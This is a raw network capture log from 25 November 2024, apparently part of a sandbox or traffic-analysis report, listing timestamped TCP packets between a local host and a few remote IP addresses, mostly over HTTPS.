                                                                                                                          Nov 25, 2024 16:43:28.474494934 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474545002 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474952936 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474968910 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474977970 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474982977 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.479089022 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.479118109 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.479191065 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.485984087 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.486016989 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.486143112 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.486176014 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.486205101 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.487030029 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.487046003 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.718722105 CET4973780192.168.2.494.46.180.190
                                                                                                                          Nov 25, 2024 16:43:28.839540958 CET804973794.46.180.190192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.422624111 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.423286915 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.423317909 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.423660040 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.423665047 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.743721962 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.744343042 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.744363070 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.744729042 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.744734049 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.884597063 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.884665012 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.884859085 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.885071039 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.885071039 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.885088921 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.885099888 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.887931108 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.887981892 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:29.888052940 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.888185024 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:29.888206005 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.092474937 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.093162060 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.093215942 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.093609095 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.093624115 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.198308945 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.198462009 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.198636055 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.201688051 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.201688051 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.201689005 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.201711893 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.201719046 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.201724052 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.201843977 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.202006102 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.202017069 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.287698984 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.288146019 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.288201094 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.288693905 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.288707972 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.292179108 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.292511940 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.292536974 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.293157101 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.293162107 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.714735985 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.714793921 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.714852095 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.716120958 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.716164112 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.716195107 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.716209888 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.723790884 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.723828077 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.723880053 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.724553108 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.724574089 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.818840027 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.819003105 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.819062948 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.819209099 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.819225073 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.819235086 CET49832443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.819240093 CET4434983213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.822293043 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.822365046 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.822443962 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.822592974 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.822622061 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.902652979 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.902725935 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.902787924 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.902915001 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.902940989 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.902966976 CET49831443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.902978897 CET4434983113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.906193972 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.906230927 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:30.906308889 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.906505108 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:30.906527042 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.618307114 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.623765945 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:31.623847008 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.624154091 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:31.624170065 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.973140001 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.975208044 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:31.975238085 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:31.975567102 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:31.975573063 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.059426069 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.059501886 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.059704065 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.059858084 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.059915066 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.059952021 CET49833443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.059967041 CET4434983313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.063702106 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.063781023 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.063888073 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.064055920 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.064094067 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.410633087 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.410782099 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.410844088 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.411015034 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.411039114 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.411048889 CET49834443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.411053896 CET4434983413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.414470911 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.414508104 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.414577007 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.414884090 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.414896965 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.504703999 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.505208015 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.505235910 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.505691051 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.505696058 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.613200903 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.613883972 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.613934040 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.614597082 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.614610910 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.851490021 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.851983070 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.852001905 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.852435112 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.852440119 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.954042912 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.954121113 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.954323053 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.954504967 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.954504967 CET49836443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.954519033 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.954526901 CET4434983613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.957212925 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.957252026 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:32.957367897 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.957535982 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:32.957561016 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.118104935 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.118261099 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.118402004 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.118458033 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.118458033 CET49837443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.118494987 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.118520975 CET4434983713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.121342897 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.121382952 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.121455908 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.121577978 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.121583939 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.305810928 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.305892944 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.305972099 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.306075096 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.306091070 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.306101084 CET49838443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.306107044 CET4434983813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.316085100 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.316170931 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.316230059 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.316483974 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.316519976 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.846586943 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.847374916 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.847459078 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.847624063 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.847719908 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:33.847735882 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.847765923 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:33.847836018 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:34.172429085 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.173100948 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.173193932 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.173721075 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.173738003 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.291743994 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.291812897 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.291879892 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.292097092 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.292145014 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.292175055 CET49839443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.292191029 CET4434983913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.296408892 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.296442986 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.296504021 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.296684027 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.296696901 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.607887030 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.608030081 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.608211994 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.608290911 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.608290911 CET49840443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.608325005 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.608350039 CET4434984013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.611377001 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.611438990 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.611542940 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.611712933 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.611737967 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.731677055 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:34.731709957 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.738107920 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.738610983 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.738677979 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.739101887 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.739120960 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.986037970 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.986669064 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.986701965 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:34.987049103 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:34.987055063 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.327812910 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.328319073 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.328366995 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.328866005 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.328881025 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.332762957 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.332835913 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.332890987 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.333060980 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.333076954 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.333086967 CET49842443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.333091974 CET4434984213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.337213993 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.337249994 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.337412119 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.337500095 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.337510109 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.440243006 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.440439939 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.440501928 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.440659046 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.440677881 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.440689087 CET49843443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.440695047 CET4434984313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.443850040 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.443886042 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.443938017 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.444138050 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.444149017 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.785092115 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.785152912 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.785320997 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.785403967 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.785403967 CET49844443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.785450935 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.785497904 CET4434984413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.788115025 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.788216114 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:35.788311958 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.788507938 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:35.788537979 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.026165009 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.026897907 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.026917934 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.027489901 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.027496099 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.469923019 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.469984055 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.470295906 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.470295906 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.470295906 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.472856998 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.472898960 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.472970963 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.473107100 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.473123074 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.488382101 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.488785028 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.488846064 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.489346981 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.489362001 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.779422045 CET49845443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.779445887 CET4434984513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.925256014 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.925410986 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.925641060 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.925641060 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.928417921 CET49846443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.928421021 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.928457022 CET4434984613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.928504944 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:36.928603888 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.928754091 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:36.928786993 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.122808933 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.123348951 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.123375893 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.123842001 CET49847443192.168.2.413.107.246.63
